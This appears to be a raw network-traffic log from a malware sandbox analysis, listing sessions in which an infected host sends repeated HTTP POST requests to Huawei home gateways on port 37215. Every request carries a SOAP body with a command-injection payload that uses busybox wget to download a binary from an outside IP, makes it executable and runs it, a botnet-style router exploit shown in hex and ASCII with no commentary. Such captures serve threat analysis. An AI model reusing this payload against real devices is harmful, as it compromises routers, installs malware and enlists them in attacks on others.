                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1214192.168.2.155156041.65.132.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176466942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1215192.168.2.155973641.137.25.4037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.176496029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1216192.168.2.154982841.6.252.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178374052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1217192.168.2.155128641.240.212.18437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178406954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1218192.168.2.153287641.175.155.23937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178417921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1219192.168.2.154042041.87.38.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178468943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1220192.168.2.154865441.23.87.20937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178468943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1221192.168.2.155575241.208.40.12237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178492069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1222192.168.2.156017241.31.123.537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178513050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1223192.168.2.154074641.73.135.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.178561926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 